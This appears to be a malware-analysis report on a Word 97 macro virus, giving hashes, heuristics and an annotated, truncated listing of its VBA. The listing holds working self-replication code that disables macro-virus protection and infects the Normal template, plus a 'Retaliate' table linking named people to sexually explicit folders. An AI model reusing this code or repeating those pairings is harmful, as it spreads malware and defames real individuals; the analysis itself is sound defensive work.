Doc.Trojan.MyEnemy-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 d541bb7f0a891d62…

MALICIOUS

Office (OLE)

44.5 KB Created: 2000-12-14 16:35:00 Authoring application: Microsoft Word 8.0 (Word 97) First seen: 2012-06-14
MD5: aef1f42aaf12e3e9eb67cbba34d1877b SHA-1: 48a054b921e88a89bcee0a66f46fd2d6391797a9 SHA-256: d541bb7f0a891d6259eb5ed83329e3b51962046038a91ff7410c955047cdfce4
120 Risk Score

Malware Insights

Doc.Trojan.MyEnemy-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1137.001 Office Template Macros (Normal template infection, directly observed in the extracted macro) · T1566.001 Spearphishing Attachment (inferred from the file type only; the sample itself carries no delivery evidence)

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.MyEnemy-1'. The extracted VBA lives in the ThisDocument module and defines both a Document_Open and a Document_Close handler. Document_Open sets Options.VirusProtection = False (disabling Word's macro-virus warning) and wipes the first code module of the active document and of the Normal template unless that module contains the marker constant mrk. Document_Close then copies the macro in both directions — from the Normal template into any document being saved in .doc/.dot format, and from the document into the Normal template — and saves both, which is classic macro-virus replication via Normal.dot. After replication, a section commented 'Retaliate' builds tables of personal names (mostly Russian; they appear as mojibake here because CP1251 text is rendered through a Latin-2 mapping), directory paths under 'C:\My documents' (and apparently 'C:\Мои документы', the Russian-locale equivalent) with sexually explicit folder names, and photo/video base names; what the code finally does with these tables lies beyond the truncated preview and should not be assumed. Nothing in the visible code downloads or executes external content, and the strings are mis-encoded rather than obfuscated. For remediation, the mrk literal is a reliable host indicator: any Normal.dot/Normal.dotm containing it should be treated as infected and replaced.

Heuristics 3

  • ClamAV: Doc.Trojan.MyEnemy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open event handler runs automatically when the file is opened. This sample also defines Document_Close, which is where the Normal-template replication and the payload setup actually occur, so both handlers need review.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21361 bytes
SHA-256: 65af0c66c09a906944dedcba0de105c40647942a05a20a67c5bd70dd04216fd5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- Module-level state of the infected ThisDocument module (see VB_Name above) ---
' NOTE(review): in VBA only the last name in a comma-separated Dim gets the
' declared type, so acd is a Variant and only ntt is As Object; both are later
' Set to VBComponent objects in document_open / document_close.
Dim acd, ntt As Object
' 21 x 2 string table filled in document_close (under the 'Retaliate comment):
' column 0 holds a personal name, column 1 a directory path on C:\.
Dim MyEnemy$(20, 1)
' String tables of photo and video base names, also filled in document_close.
Dim MyPhoto$(10)
Dim MyVideo$(6)
' Presumably file extensions; not assigned anywhere in the visible portion.
Dim MyExten$(5)
' Not referenced in the visible portion of the module.
Dim zw As Byte
' Infection marker. document_open searches the first VBComponent of both the
' active document and the Normal template for this exact string and deletes
' every line of a module that lacks it, so the presence of this literal in
' Normal.dot is a reliable indicator that a host is infected. The literal
' looks like Cyrillic text stored as Windows-1251 bytes and rendered here
' through a Latin-2 (CP1250) mapping -- TODO confirm against the raw VBA stream.
Const mrk = "čó ŕčŕ čŕĺńč îňâđů îçęç îčńđâéŔ .ÂđńíďńíÔíđâęěń îŕččď ŕŕóĘěńŕîî .Â"
' Word Document_Open event handler: runs automatically when the document is
' opened. It disables Word's macro-virus warning and ensures that only code
' carrying the infection marker (mrk) survives in the document's and the
' Normal template's first code module. Replication itself happens later in
' document_close.
Private Sub document_open()
 ' Suppress every error so a missing VBProject or module never raises a dialog.
 On Error Resume Next
 ' Clears the "Macro virus protection" option of Word 97/2000-era versions, so
 ' subsequently opened documents run their macros without a prompt.
 Options.VirusProtection = False
 ' First VBComponent of the open document and of the Normal template
 ' (presumably the ThisDocument module of each -- not verified here).
 ' NOTE(review): on modern Office, VBProject access is blocked unless "Trust
 ' access to the VBA project object model" is enabled; the authoring
 ' application is Word 8.0, where no such gate existed -- TODO confirm.
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 ' Search lines 1-1000 of each module for the marker; if it is absent, erase
 ' all lines of that module. This removes any pre-existing macro code
 ' (possibly protective or competing) before document_close re-seeds the
 ' module from the infected copy.
 If Not acd.codemodule.Find(mrk, 1, 1, 1000, 1000) Then acd.codemodule.deletelines 1, acd.codemodule.countoflines
 If Not ntt.codemodule.Find(mrk, 1, 1, 1000, 1000) Then ntt.codemodule.deletelines 1, ntt.codemodule.countoflines
End Sub
Private Sub document_close()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 s$ = ""
 If (acd.codemodule.countoflines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  v2 = 1
  For v = 1 To ntt.codemodule.countoflines
   s$ = ntt.codemodule.lines(v, 1)
   If s$ <> "" Then
    acd.codemodule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 ActiveDocument.Save
 If ntt.codemodule.countoflines <= 1 Then
  v2 = 1
  For v = 1 To acd.codemodule.countoflines
   s$ = acd.codemodule.lines(v, 1)
   If s$ <> "" Then
    ntt.codemodule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 NormalTemplate.Save
 'Retaliate
 MyEnemy$(0, 0) = "Ôđîëîâ Î. Ŕ."
 MyEnemy$(1, 0) = "Ĺěĺëü˙íĺíęî Â. Â."
 MyEnemy$(2, 0) = "Ďîäăîđíîâŕ Ĺ. Č."
 MyEnemy$(3, 0) = "Ěŕňđîńîâŕ Îëüăŕ Ĺâăĺíüĺâíŕ"
 MyEnemy$(4, 0) = "Ęîâŕëĺâŕ Î Ţ"
 MyEnemy$(5, 0) = "Ěîńčí Ę. Ď."
 MyEnemy$(6, 0) = "Řŕëűăčí Ď. Ń."
 MyEnemy$(7, 0) = "Ëčőňĺđ Ŕíŕňîëčé Ěčőŕéëîâč÷"
 MyEnemy$(8, 0) = "Ŕ. Ě. Ęŕđďîâ"
 MyEnemy$(9, 0) = "Ęîçëîâ Ŕíäđĺé Ŕëĺęńŕíäđîâč÷"
 MyEnemy$(10, 0) = "Ďŕâëîâŕ Îëüăŕ"
 MyEnemy$(11, 0) = "Äěčňđčĺâ Ńĺđăĺé"
 MyEnemy$(12, 0) = "Bob Klein"
 MyEnemy$(13, 0) = "Jim Rein"
 MyEnemy$(14, 0) = "John A. Hopkins"
 MyEnemy$(15, 0) = "Garry Wood"
 MyEnemy$(17, 0) = "Debra Henriksen"
 MyEnemy$(18, 0) = "Patricia "
 MyEnemy$(19, 0) = "Hitler"
 
 For v = 0 To 19
  If (v <= 11) Or (v = 19) Then
   MyEnemy$(v, 1) = "C:\Ěîč äîęóěĺíňű"
  Else
   MyEnemy$(v, 1) = "C:\My documents"
  End If
 Next v
 MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Ňđŕőŕíüĺ\"
 MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ďîđíî\"
 MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ńĺęń\"
 MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Čçâđŕůĺíč˙\"
 MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Ňđŕő\"
 MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Ęëóáíč÷ęŕ\"
 MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äĺâóřęč\Ăĺë˙\"
 MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîňęč äĺâóřĺę\Ęîěčńńŕđîâŕ Ŕíăĺëčíŕ Âčňŕëüĺâíŕ\"
 MyEnemy$(8, 1) = "C:\Ňîëüęî äë˙ ěĺí˙\Ďîđíóőŕ\Ăĺëęŕ\"
 MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíŕćĺííŕ˙ íŕňóđŕ\Ŕíăĺëčíŕ\"
 MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ńĺęń_ęîëëĺęöč˙\Ęîěčńńŕđîâŕ_Ŕ_Â\"
 MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷řčĺ ďîďęč ăîđîäŕ\"
 MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
 MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
 MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
 MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
 MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
 MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
 MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
 MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âűńňŕâęŕ ńĺęńŕ\Đîńńč˙\Ŕńňđŕőŕíü\"
 
 MyPhoto$(0) = "Angelina"
 MyPhoto$(1) = "Gela"
 MyPhoto$(2) = "Body_A"
 MyPhoto$(3) = "Fuck"
 MyPhoto$(4) = "Fuck_ass"
 MyPhoto$(5) = "Ass"
 MyPhoto$(6) = "Cnt"
 MyPhoto$(7) = "Klzm"
 MyPhoto$(8) = "Kk"
 MyPhoto$(9) = "Urn"
 
 MyVideo$(0) = "Gela&Seryj"
 MyVideo$(1) = "Gela&Vlad"
 MyVideo$(2) = "Gela&Tolj
... (truncated)